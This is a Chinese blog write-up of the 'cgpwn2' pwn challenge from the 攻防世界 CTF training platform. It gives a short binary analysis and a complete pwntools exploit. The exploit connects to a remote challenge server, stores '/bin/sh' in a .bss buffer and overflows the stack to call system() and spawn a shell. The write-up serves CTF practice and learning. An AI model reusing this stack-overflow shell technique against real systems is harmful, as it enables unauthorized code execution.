首页 > 其他分享 >攻防世界5

攻防世界5

时间:2024-10-31 19:16:42浏览次数:3  
标签:攻防 payload 世界 system bss io p32 双击

cgpwn2

发现是32位文件

打开main函数发现hello双击进入

这里我们发现栈溢出了,双击name

我们发现了bss

发现这题的system有点问题,后门需要我们自己输入,刚好有bss我们直接用它

知道system的地址

exp:

from pwn import *
context(os='linux',arch='i386',log_level='debug')
io = remote('61.147.171.105','61646')
bss = 0x804A080
system = 0x8048420
padding = b'a'*(0x26+0x4)
io.sendlineafter(b'name','/bin/sh')
payload = padding + p32(system) + p32(0xbeff) + p32(bss)
#覆盖返回地址跳转指定的返回地址攻击
io.sendlineafter(b'here:',payload)
io.interactive()

得到flag

标签:攻防,payload,世界,system,bss,io,p32,双击
From: https://blog.csdn.net/fanshaoze/article/details/143415082

相关文章

  • 网安人必备的知识库/漏洞库/代码审计/SRC漏洞挖掘/攻防演练应急响应
    免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。再次说明文章所涉及内容,仅供安全研究与教学之用,由于传播、利......
  • 能操控电脑的 Computer Use 究竟是什么?万能胶水、旧世界操作员,还是无所不在的智能?| 播
       「编码人声」是由「RTE开发者社区」策划的一档播客节目,关注行业发展变革、开发者职涯发展、技术突破以及创业创新,由开发者来分享开发者眼中的工作与生活。 无论你是否熟悉FunctionCall、ToolUse或者RPA,都可能刷到了Claude推出「能像人一样操控电脑」的Comput......
  • POLIR-Society-Organization-Politics: “How”-政治的: Versatility+历史+应然+实然:
    组织行为学案例:政治+经济的博弈+投资欧盟......
  • 20222314 2024-2025-1 《网络与系统攻防技术》 实验三实验报告
    网络与系统攻防实验报告实验时间:2024-10-25~2024-10-31实验人员:20222314陈振烨实验地点:地下机房指导教师:王志强本周学习内容学习了免杀的相关原理,掌握了msf的编码免杀基本操作,成功下载了veil加壳器并进行加壳免杀实践内容(1)正确使用msf编码器,veil-evasion,自己利用shell......
  • 20222307 2024-2025-1 《网络与系统攻防技术》 实验三实验报告
    1.实验内容1.1实践内容(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用msfvenom生成jar、apk等其他文件使用veil加壳工具使用C+shellcode进行编程(2)通过组合应用各种技术实现恶意代码免杀(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成......
  • 使用 FastGPT 实现最佳 AI 翻译工作流:全世界最信达雅的翻译
    想让AI翻译既准确又地道?本文将教你如何利用FastGPT打造一个革命性的翻译工作流。它不仅支持文本翻译,还能直接处理文档,更能通过自定义术语表确保专业术语的翻译准确性,堪称翻译神器!直接看效果:再来看术语表:这也太适合翻译产品官网和官方文档了吧??背景吴恩达教授最近提出了一......
  • 20222311 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实践内容(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,不要截图。与......
  • # 20222322 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实验内容(1)使用msfvenom和msf编码器生成文件使用msfvenom生成exe文件,并进行编码。生成jar文件,用于Java环境下的攻击。生成PHP文件,用于Web服务器上的攻击。(2)使用Veil工具生成恶意代码下载并安装Veil-Evasion,使用Veil生成恶意代码。(3)使用C+shellco......
  • 20222401 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实践内容正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧通过组合应用各种技术实现恶意代码免杀用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本1.2回答问题杀软是如何检测出恶意代码的?--特征码、启发......
  • 20222420 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    202224202024-2025-1《网络与系统攻防技术》实验三实验报告1.实验内容1.1本周学习内容1.1.1后门技术接着上一节课的内容继续学习了进程隐藏技术,它还包含基于DLL的进程隐藏技术:远程注入Dll技术基于远程线程注入代码的进程隐藏技术Rootkit方式分用户级和内核级......